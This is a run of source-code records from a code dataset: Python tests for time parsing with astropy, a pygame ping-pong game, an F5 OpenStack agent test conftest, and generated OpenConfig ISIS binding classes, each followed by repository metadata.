dt = parse_time(ts)
assert isinstance(dt, astropy.time.Time)
assert dt == LANDING
def test_parse_time_pandas_series():
inputs = [datetime(2012, 1, i) for i in range(1, 13)]
ind = pandas.Series(inputs)
as_inps = Time(inputs)
dts = parse_time(ind)
assert isinstance(dts, astropy.time.Time)
assert np.all(dts == as_inps)
def test_parse_time_pandas_series_2():
inputs = [[datetime(2012, 1, 1, 0, 0), datetime(2012, 1, 2, 0, 0)],
[datetime(2012, 1, 3, 0, 0), datetime(2012, 1, 4, 0, 0)]]
ind = pandas.Series(inputs)
as_inps = Time(inputs)
apts = parse_time(ind)
assert isinstance(apts, astropy.time.Time)
assert np.all(apts == as_inps)
assert apts.shape == as_inps.shape
def test_parse_time_pandas_index():
inputs = [datetime(2012, 1, i) for i in range(1, 13)]
ind = pandas.DatetimeIndex(inputs)
as_inps = Time(inputs)
dts = parse_time(ind)
assert isinstance(dts, astropy.time.Time)
assert np.all(dts == as_inps)
def test_parse_time_numpy_date():
inputs = np.arange('2005-02', '2005-03', dtype='datetime64[D]')
dts = parse_time(inputs)
assert isinstance(dts, astropy.time.Time)
assert np.all(dts == Time([str(dt.astype('M8[ns]')) for dt in inputs]))
def test_parse_time_numpy_datetime():
inputs = np.arange('2005-02-01T00', '2005-02-01T10', dtype='datetime64')
dts = parse_time(inputs)
assert isinstance(dts, astropy.time.Time)
assert np.all(dts == Time([str(dt.astype('M8[ns]')) for dt in inputs]))
def test_parse_time_individual_numpy_datetime():
dt64 = np.datetime64('2005-02-01T00')
dt = parse_time(dt64)
assert isinstance(dt, astropy.time.Time)
assert dt == Time('2005-02-01', format='isot')
def test_parse_time_numpy_datetime_timezone():
dt64 = np.datetime64('2014-02-07T16:47:51-0500')
dt = parse_time(dt64)
assert dt == Time('2014-02-07T21:47:51', format='isot')
def test_parse_time_numpy_datetime_ns():
dt64 = np.datetime64('2014-02-07T16:47:51.008288000')
dt = parse_time(dt64)
assert dt == Time('2014-02-07T16:47:51.008288000', format='isot')
dt64 = np.datetime64('2014-02-07T16:47:51.008288123')
dt = parse_time(dt64)
assert dt == Time('2014-02-07T16:47:51.008288123', format='isot')
dt64 = np.datetime64('2014-02-07T16:47:51.234565999')
dt = parse_time(dt64)
assert dt == Time('2014-02-07T16:47:51.234565999')
def test_parse_time_astropy():
ip = astropy.time.Time(['2016-01-02T23:00:01'])
astropy_time = parse_time(ip)
assert astropy_time == ip
assert astropy_time.format == 'isot'
def test_parse_time_datetime():
dt = datetime(2014, 2, 7, 16, 47, 51, 8288)
assert parse_time(dt) == Time('2014-02-07 16:47:51.008288')
assert parse_time(dt).format == 'datetime'
def test_parse_time_date():
dt = parse_time(date(1966, 2, 3))
assert dt == Time('1966-2-3')
assert dt.format == 'iso'
def test_parse_time_now():
"""
Ensure 'parse_time' can be called with 'now' argument to get utc
"""
now = parse_time('now')
assert isinstance(now, astropy.time.Time)
assert now.format == 'datetime'
assert now.scale == 'utc'
def test_parse_time_ISO():
dt1 = Time('1966-02-03T20:17:40')
assert parse_time('1966-02-03').jd == LANDING.jd
assert (
parse_time('1966-02-03T20:17:40') == dt1
)
assert (
parse_time('19660203T201740') == dt1
)
dt2 = Time('2007-05-04T21:08:12.999999')
dt3 = Time('2007-05-04T21:08:12')
dt4 = Time('2007-05-04T21:08:00')
dt5 = Time('2007-05-04')
lst = [
('2007-05-04T21:08:12.999999', dt2),
('20070504T210812.999999', dt2),
('2007/05/04 21:08:12.999999', dt2),
('2007-05-04 21:08:12.999999', dt2),
('2007/05/04 21:08:12', dt3),
('2007-05-04 21:08:12', dt3),
('2007-05-04 21:08', dt4),
('2007-05-04T21:08:12', dt3),
('20070504T210812', dt3),
('2007-May-04 21:08:12', dt3),
('2007-May-04 21:08', dt4),
('2007-May-04', dt5),
('2007-05-04', dt5),
('2007/05/04', dt5),
('04-May-2007', dt5),
('04-May-2007 21:08:12.999999', dt2),
('20070504_210812', dt3),
]
for k, v in lst:
dt = parse_time(k)
assert is_time_equal(dt, v)
assert dt.format == 'isot'
def test_parse_time_tai():
dt = Time('2007-05-04T21:08:12', scale='tai')
dt2 = parse_time('2007.05.04_21:08:12_TAI')
assert dt == dt2
assert dt.scale == dt2.scale
def test_parse_time_leap_second():
dt1 = parse_time('1995-12-31 23:59:60')
dt2 = Time('1995-12-31T23:59:60')
assert dt1.jd == dt2.jd
dt3 = parse_time('1995-Dec-31 23:59:60')
assert dt2.jd == dt3.jd
@pytest.mark.parametrize("ts,fmt", [
(1950.0, 'byear'),
('B1950.0', 'byear_str'),
(63072064.184, 'cxcsec'),
(datetime(2000, 1, 2, 12, 0, 0), 'datetime'),
(2000.45, 'decimalyear'),
('2000-01-01T00:00:00.000(TAI)', 'fits'),
(630720013.0, 'gps'),
('2000-01-01 00:00:00.000', 'iso'),
('2000-01-01T00:00:00.000', 'isot'),
(2451544.5, 'jd'),
(2000.0, 'jyear'),
('J2000.0', 'jyear_str'),
(51544.0, 'mjd'),
(730120.0003703703, 'plot_date'),
(946684800.0, 'unix'),
('2000:001:00:00:00.000', 'yday')
])
def test_parse_time_astropy_formats(ts, fmt):
dt = parse_time(ts, format=fmt)
assert dt.format == fmt
def test_parse_time_int_float():
# int and float values are not unique
# The format has to be mentioned
with pytest.raises(ValueError):
parse_time(100)
with pytest.raises(ValueError):
parse_time(100.0)
@pytest.mark.parametrize("scale", [
'tai',
'tcb',
'tcg',
'tdb',
'tt',
'ut1',
'utc'
])
def test_parse_time_scale(scale):
dt = parse_time('2007-05-04T21:08:12', scale=scale)
dt2 = Time('2007-05-04T21:08:12', scale=scale)
assert is_time_equal(dt, dt2)
assert dt.scale == scale
dt = parse_time(np.datetime64('2007-05-04T21:08:12'), scale=scale)
dt2 = Time('2007-05-04T21:08:12', scale=scale)
assert dt == dt2
assert dt.scale == scale
dt = datetime(2014, 2, 7, 16, 47, 51)
dt = parse_time(dt, scale=scale)
dt2 = Time('2014-02-07T16:47:51', scale=scale)
assert dt == dt2
assert dt.scale == scale
dt = date(2014, 2, 7)
dt = parse_time(dt, scale=scale)
dt2 = Time('2014-02-07', scale=scale)
assert dt == dt2
assert dt.scale == scale
def test_parse_time_list():
tstrings = ['2010-09-03 00:00:00', '2005-09-03 06:00:00',
'1995-12-31 23:59:60']
assert np.all(parse_time(tstrings) == Time(tstrings))
def test_parse_time_list_2():
tstrings = [['1998-01-01 00:00:01', '1998-01-01 00:00:02'],
['1998-01-01 00:00:03', '1995-12-31 23:59:60']]
assert np.all(parse_time(tstrings) == Time(tstrings))
def test_break_time():
t = datetime(2007, 5, 4, 21, 8, 12)
assert time.break_time(t) == '20070504_210812'
def test_day_of_year():
# Note that 2008 is a leap year, 2011 is a standard year
# test that it starts at 1
assert time.day_of_year('2011/01/01') == 1.0
# test fractional day
assert time.day_of_year('2011/01/01 06:00') == 1.25
assert time.day_of_year('2011/01/01 12:00') == 1.50
assert time.day_of_year('2011/01/01 18:00') == 1.75
# test correct number of days in a (standard) year
assert time.day_of_year('2011/12/31') == 365
# test correct number of days in a (leap) year
assert time.day_of_year('2008/12/31') == 366
# test a few extra dates in standard year
assert time.day_of_year('2011/08/01') == 213
assert time.day_of_year('2011/04/10') == 100
assert time.day_of_year('2011/01/31') == 31
assert time.day_of_year('2011/09/30') == 273
# test a few extra dates in a leap year
assert time.day_of_year('2008/08/01') == 214
assert time.day_of_year('2008/04/10') == 101
assert time.day_of_year('2008/01/31') == 31
assert time.day_of_year('2008/09/30') == 274
def test_day_of_year_leapsecond():
# 2015 had a leap second.
# 30/06/2015 23:59:60 was a leap second
assert time.day_of_year('2015/01/31') == 31
assert time.day_of_year('2015/04/10') == 100
assert time.day_of_year('2015/06/30 23:59:60') == 182
assert time.day_of_year('2015/08/01') == 213.00001157407408
assert time.day_of_year('2015/09/30') == 273.00001157407405
def test__iter_empty():
class CountDown(object):
def __init__(self, start_from=0):
self.start = start_from
def __iter__(self):
return self
def __next__(self):
self.start -= 1
if self.start < 0:
raise StopIteration
return self.start
next = __next__ # Support Py2.x
one_count = CountDown(1)
assert time.time._iter_empty(one_count) is False
assert time.time._iter_empty(one_count) is True
def test_is_time():
assert time.is_time(datetime.utcnow()) is True
assert time.is_time('2017-02-14 08:08:12.999') is True
assert time.is_time(Time.now()) is True
assert time.is_time(None) is False
assert time.is_time('2016-14-14 19:08') is False
def test_is_time_in_given_format():
assert time.is_time_in_given_format('2017-02-14 08:08:12.999', "%Y-%m-%d %H:%M:%S.%f") is True
assert time.is_time_in_given_format('2017-02-14 08:08:12.999', "%Y-%m-%dT%H:%M:%S.%f") is False
def test_get_day():
end_of_day = datetime(year=2017, month=1, day=1, hour=23, minute=59, second=59,
microsecond=999)
begining_of_day = time.get_day(end_of_day)
assert begining_of_day.year == 2017
assert begining_of_day.month == 1
assert begining_of_day.day == 1
assert begining_of_day.hour == 0
assert begining_of_day.minute == 0
assert begining_of_day.second == 0
assert begining_of_day.microsecond == 0
| 27.952607
| 99
| 0.629196
|
4a0a458acf65648749f6a31ca5582510dd0f9940
| 2,901
|
py
|
Python
|
ping_pong.py
|
AlexLito666/ping_ping
|
803a2cb57501b31767622c80722ade2866982a08
|
[
"CC0-1.0"
] | null | null | null |
ping_pong.py
|
AlexLito666/ping_ping
|
803a2cb57501b31767622c80722ade2866982a08
|
[
"CC0-1.0"
] | null | null | null |
ping_pong.py
|
AlexLito666/ping_ping
|
803a2cb57501b31767622c80722ade2866982a08
|
[
"CC0-1.0"
] | null | null | null |
from pygame import *
'''Необходимые классы'''
#класс-родитель для спрайтов
class GameSprite(sprite.Sprite):
def __init__(self, player_image, player_x, player_y, player_speed, wight, height):
super().__init__()
self.image = transform.scale(image.load(player_image), (wight, height)) #вместе 55,55 - параметры
self.speed = player_speed
self.rect = self.image.get_rect()
self.rect.x = player_x
self.rect.y = player_y
def reset(self):
window.blit(self.image, (self.rect.x, self.rect.y))
class Player(GameSprite):
def update_r(self):
keys = key.get_pressed()
if keys[K_UP] and self.rect.y > 5:
self.rect.y -= self.speed
if keys[K_DOWN] and self.rect.y < win_height - 80:
self.rect.y += self.speed
def update_l(self):
keys = key.get_pressed()
if keys[K_w] and self.rect.y > 5:
self.rect.y -= self.speed
if keys[K_s] and self.rect.y < win_height - 80:
self.rect.y += self.speed
#игровая сцена:
back = (200, 255, 255) #цвет фона (background)
win_width = 600
win_height = 500
window = display.set_mode((win_width, win_height))
window.fill(back)
#флаги, отвечающие за состояние игры
game = True
finish = False
clock = time.Clock()
FPS = 60
#создания мяча и ракетки
racket1 = Player('racket.png', 10, 200, 4, 30, 150)
racket2 = Player('racket.png', 560, 200, 4, 30, 150)
ball = GameSprite('ball.png', 200, 200, 4, 50, 50)
font.init()
font = font.Font(None, 35)
lose1 = font.render('PLAYER 1 LOSE!', True, (180, 0, 0))
lose2 = font.render('PLAYER 2 LOSE!', True, (180, 0, 0))
speed_x = 3
speed_y = 3
while game:
for e in event.get():
if e.type == QUIT:
game = False
if finish != True:
window.fill(back)
racket1.update_l()
racket2.update_r()
ball.rect.x += speed_x
ball.rect.y += speed_y
if sprite.collide_rect(racket1, ball) or sprite.collide_rect(racket2, ball):
speed_x *= -1
speed_y *= 1
#если мяч достигает границ экрана, меняем направление его движения
if ball.rect.y > win_height-50 or ball.rect.y < 0:
speed_y *= -1
#если мяч улетел дальше ракетки, выводим условие проигрыша для первого игрока
if ball.rect.x < 0:
finish = True
window.blit(lose1, (200, 200))
game_over = True
#если мяч улетел дальше ракетки, выводим условие проигрыша для второго игрока
if ball.rect.x > win_width:
finish = True
window.blit(lose2, (200, 200))
game_over = True
racket1.reset()
racket2.reset()
ball.reset()
display.update()
clock.tick(FPS)
| 29.30303
| 106
| 0.577732
|
4a0a45b0aba470ba1b9b68daeaa2cb57055aa136
| 4,291
|
py
|
Python
|
test/functional/neutronless/disconnected_service/conftest.py
|
F5K-Jayson/f5-openstack-agent
|
f98f48266f029a719a2d446a06c741f0ed6653ff
|
[
"Apache-2.0"
] | null | null | null |
test/functional/neutronless/disconnected_service/conftest.py
|
F5K-Jayson/f5-openstack-agent
|
f98f48266f029a719a2d446a06c741f0ed6653ff
|
[
"Apache-2.0"
] | null | null | null |
test/functional/neutronless/disconnected_service/conftest.py
|
F5K-Jayson/f5-openstack-agent
|
f98f48266f029a719a2d446a06c741f0ed6653ff
|
[
"Apache-2.0"
] | 2
|
2018-02-27T08:42:30.000Z
|
2018-03-09T16:34:46.000Z
|
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import mock
import os
import pytest
import time
from f5.bigip import ManagementRoot
from f5.utils.testutils.registrytools import register_device
from f5.utils.testutils.registrytools import AGENT_LB_DEL_ORDER
from f5.utils.testutils.registrytools import order_by_weights
from icontrol.exceptions import iControlUnexpectedHTTPError
from f5_openstack_agent.lbaasv2.drivers.bigip.icontrol_driver import\
iControlDriver
@pytest.fixture(scope='module')
def makelogdir(request):
logtime = '%0.0f' % time.time()
dirname = os.path.dirname(request.module.__file__)
modfname = request.module.__name__
logdirname = os.path.join(dirname, 'logs', modfname, logtime)
os.makedirs(logdirname)
return logdirname
def _get_nolevel_handler(logname):
rootlogger = logging.getLogger()
for h in rootlogger.handlers:
rootlogger.removeHandler(h)
rootlogger.setLevel(logging.INFO)
fh = logging.FileHandler(logname)
fh.setLevel(logging.INFO)
rootlogger.addHandler(fh)
return fh
def remove_elements(bigip, uris, vlan=False):
for t in bigip.tm.net.fdb.tunnels.get_collection():
if t.name != 'http-tunnel' and t.name != 'socks-tunnel':
t.update(records=[])
registry = register_device(bigip)
ordered = order_by_weights(uris, AGENT_LB_DEL_ORDER)
for selfLink in ordered:
try:
if selfLink in registry:
registry[selfLink].delete()
except iControlUnexpectedHTTPError as exc:
sc = exc.response.status_code
if sc == 404:
logging.debug(sc)
elif sc == 400 and 'fdb/tunnel' in selfLink and vlan:
# If testing VLAN (with vCMP) the fdb tunnel cannot be deleted
# directly. It goes away when the net tunnel is deleted
continue
elif sc == 400\
and 'mgmt/tm/net/tunnels/tunnel/' in selfLink\
and 'tunnel-vxlan' in selfLink:
for t in bigip.tm.net.fdb.tunnels.get_collection():
if t.name != 'http-tunnel' and t.name != 'socks-tunnel':
t.update(records=[])
registry[selfLink].delete()
else:
raise
def setup_neutronless_test(request, bigip, makelogdir, vlan=False):
pretest_snapshot = frozenset(register_device(bigip))
logname = os.path.join(makelogdir, request.function.__name__)
loghandler = _get_nolevel_handler(logname)
def remove_test_created_elements():
posttest_registry = register_device(bigip)
created = frozenset(posttest_registry) - pretest_snapshot
remove_elements(bigip, created, vlan)
rootlogger = logging.getLogger()
rootlogger.removeHandler(loghandler)
request.addfinalizer(remove_test_created_elements)
return loghandler
@pytest.fixture
def configure_icd():
class ConfFake(object):
'''minimal fake config object to replace oslo with controlled params'''
def __init__(self, params):
self.__dict__ = params
for k, v in self.__dict__.items():
if isinstance(v, unicode):
self.__dict__[k] = v.encode('utf-8')
def __repr__(self):
return repr(self.__dict__)
def _icd(icd_config):
mock_rpc_plugin = mock.MagicMock()
mock_rpc_plugin.get_port_by_name.return_value =\
[{'fixed_ips': [{'ip_address': '10.2.2.134'}]}]
icontroldriver = iControlDriver(ConfFake(icd_config),
registerOpts=False)
icontroldriver.plugin_rpc = mock_rpc_plugin
return icontroldriver
return _icd
| 35.46281
| 79
| 0.669541
|
4a0a4615f68358364512aeee527a676301442650
| 2,829
|
py
|
Python
|
sloth/gui/rixs/items.py
|
maurov/xraysloth
|
6f18ddcb02050431574693d46bcf4b89c719c40b
|
[
"BSD-3-Clause"
] | 4
|
2015-07-03T09:38:58.000Z
|
2022-03-16T11:09:49.000Z
|
sloth/gui/rixs/items.py
|
maurov/xraysloth
|
6f18ddcb02050431574693d46bcf4b89c719c40b
|
[
"BSD-3-Clause"
] | null | null | null |
sloth/gui/rixs/items.py
|
maurov/xraysloth
|
6f18ddcb02050431574693d46bcf4b89c719c40b
|
[
"BSD-3-Clause"
] | 2
|
2017-05-22T17:14:11.000Z
|
2017-07-04T04:52:08.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""
RIXS items
"""
from silx.gui import qt
from sloth.gui.daxs.items import TreeItem
class RixsItem(TreeItem):
def __init__(self, name=None, parentItem=None, isChecked=False, data=None):
super(RixsItem, self).__init__(name, parentItem, isChecked)
self._plotWindows = None
self._currentPlotWindow = None
self._rixsdata = data
def data(self, column, name, role):
if role == qt.Qt.CheckStateRole:
if column == 0:
if self.isChecked:
return qt.Qt.Checked
else:
return qt.Qt.Unchecked
return super(RixsItem, self).data(column, name, role)
def setData(self, column, name, value, role):
if role == qt.Qt.CheckStateRole:
if value == qt.Qt.Checked:
self.isChecked = True
else:
self.isChecked = False
return True
return super(RixsItem, self).setData(column, name, value, role)
def flags(self, column):
flags = super(RixsItem, self).flags(column)
if column == 0:
return flags | qt.Qt.ItemIsUserCheckable
else:
return flags
@property
def currentPlotWindowIndex(self):
if self.currentPlotWindow is not None:
return str(self.currentPlotWindow.index())
else:
return None
@currentPlotWindowIndex.setter
def currentPlotWindowIndex(self, value):
try:
self._currentPlotWindowIndex = int(value)
except ValueError:
self.currentPlotWindow = None
else:
self.currentPlotWindow = self.plotWindows[self._currentPlotWindowIndex] # noqa
@property
def currentPlotWindow(self):
if self._currentPlotWindow is None:
if self.plotWindows:
self._currentPlotWindow = self.plotWindows[0]
else:
if self._currentPlotWindow not in self.plotWindows:
if self.plotWindows:
self._currentPlotWindow = self.plotWindows[0]
else:
self._currentPlotWindow = None
return self._currentPlotWindow
@currentPlotWindow.setter
def currentPlotWindow(self, value):
self._currentPlotWindow = value
@property
def plotWindowsIndexes(self):
indexes = list()
if self.plotWindows is not None:
for index, _ in enumerate(self.plotWindows):
indexes.append(str(index))
return indexes
@property
def plotWindows(self):
return self._plotWindows
@plotWindows.setter
def plotWindows(self, value):
self._plotWindows = value
def plot(self):
self._rixsdata.plot(plotter=self.currentPlotWindow)
| 29.778947
| 90
| 0.60304
|
4a0a461cfeac76258ace4dbcdf5478ee042869af
| 15,342
|
py
|
Python
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes_/undefined_subtlvs/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 64
|
2016-10-20T15:47:18.000Z
|
2021-11-11T11:57:32.000Z
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes_/undefined_subtlvs/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 126
|
2016-10-05T10:36:14.000Z
|
2019-05-15T08:43:23.000Z
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes_/undefined_subtlvs/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 63
|
2016-11-07T15:23:08.000Z
|
2021-09-22T14:41:16.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import undefined_subtlv
class undefined_subtlvs(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/ipv6-reachability/prefixes/prefixes/undefined-subtlvs. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container describes undefined ISIS TLVs.
"""
__slots__ = ("_path_helper", "_extmethods", "__undefined_subtlv")
_yang_name = "undefined-subtlvs"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__undefined_subtlv = YANGDynClass(
base=YANGListType(
"type",
undefined_subtlv.undefined_subtlv,
yang_name="undefined-subtlv",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="type",
extensions=None,
),
is_container="list",
yang_name="undefined-subtlv",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"ipv6-reachability",
"prefixes",
"prefixes",
"undefined-subtlvs",
]
def _get_undefined_subtlv(self):
"""
Getter method for undefined_subtlv, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes/undefined_subtlvs/undefined_subtlv (list)
YANG Description: Sub-TLVs that are not defined in the model or not recognised by
system.
"""
return self.__undefined_subtlv
def _set_undefined_subtlv(self, v, load=False):
"""
Setter method for undefined_subtlv, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes/undefined_subtlvs/undefined_subtlv (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_undefined_subtlv is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_undefined_subtlv() directly.
YANG Description: Sub-TLVs that are not defined in the model or not recognised by
system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGListType(
"type",
undefined_subtlv.undefined_subtlv,
yang_name="undefined-subtlv",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="type",
extensions=None,
),
is_container="list",
yang_name="undefined-subtlv",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """undefined_subtlv must be of a type compatible with list""",
"defined-type": "list",
"generated-type": """YANGDynClass(base=YANGListType("type",undefined_subtlv.undefined_subtlv, yang_name="undefined-subtlv", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='type', extensions=None), is_container='list', yang_name="undefined-subtlv", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='list', is_config=False)""",
}
)
self.__undefined_subtlv = t
if hasattr(self, "_set"):
self._set()
def _unset_undefined_subtlv(self):
self.__undefined_subtlv = YANGDynClass(
base=YANGListType(
"type",
undefined_subtlv.undefined_subtlv,
yang_name="undefined-subtlv",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="type",
extensions=None,
),
is_container="list",
yang_name="undefined-subtlv",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=False,
)
undefined_subtlv = __builtin__.property(_get_undefined_subtlv)
_pyangbind_elements = OrderedDict([("undefined_subtlv", undefined_subtlv)])
from . import undefined_subtlv
class undefined_subtlvs(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/ipv6-reachability/prefixes/prefixes/undefined-subtlvs. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container describes undefined ISIS TLVs.
"""
__slots__ = ("_path_helper", "_extmethods", "__undefined_subtlv")
_yang_name = "undefined-subtlvs"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__undefined_subtlv = YANGDynClass(
base=YANGListType(
"type",
undefined_subtlv.undefined_subtlv,
yang_name="undefined-subtlv",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="type",
extensions=None,
),
is_container="list",
yang_name="undefined-subtlv",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"ipv6-reachability",
"prefixes",
"prefixes",
"undefined-subtlvs",
]
def _get_undefined_subtlv(self):
"""
Getter method for undefined_subtlv, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes/undefined_subtlvs/undefined_subtlv (list)
YANG Description: Sub-TLVs that are not defined in the model or not recognised by
system.
"""
return self.__undefined_subtlv
def _set_undefined_subtlv(self, v, load=False):
"""
Setter method for undefined_subtlv, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes/undefined_subtlvs/undefined_subtlv (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_undefined_subtlv is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_undefined_subtlv() directly.
YANG Description: Sub-TLVs that are not defined in the model or not recognised by
system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGListType(
"type",
undefined_subtlv.undefined_subtlv,
yang_name="undefined-subtlv",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="type",
extensions=None,
),
is_container="list",
yang_name="undefined-subtlv",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """undefined_subtlv must be of a type compatible with list""",
"defined-type": "list",
"generated-type": """YANGDynClass(base=YANGListType("type",undefined_subtlv.undefined_subtlv, yang_name="undefined-subtlv", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='type', extensions=None), is_container='list', yang_name="undefined-subtlv", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='list', is_config=False)""",
}
)
self.__undefined_subtlv = t
if hasattr(self, "_set"):
self._set()
def _unset_undefined_subtlv(self):
self.__undefined_subtlv = YANGDynClass(
base=YANGListType(
"type",
undefined_subtlv.undefined_subtlv,
yang_name="undefined-subtlv",
parent=self,
is_container="list",
user_ordered=False,
path_helper=self._path_helper,
yang_keys="type",
extensions=None,
),
is_container="list",
yang_name="undefined-subtlv",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="list",
is_config=False,
)
undefined_subtlv = __builtin__.property(_get_undefined_subtlv)
_pyangbind_elements = OrderedDict([("undefined_subtlv", undefined_subtlv)])
| 39.541237
| 569
| 0.590145
|
4a0a464792f101a24cc97b3e67a2f554cb691010
| 6,203
|
py
|
Python
|
deeppavlov/models/vectorizers/hashing_tfidf_vectorizer.py
|
havesupper/DeepPavlov
|
142f9ff05d53e78bae77f6392613eccea0aa57f7
|
[
"Apache-2.0"
] | 1
|
2018-07-18T11:50:45.000Z
|
2018-07-18T11:50:45.000Z
|
deeppavlov/models/vectorizers/hashing_tfidf_vectorizer.py
|
havesupper/DeepPavlov
|
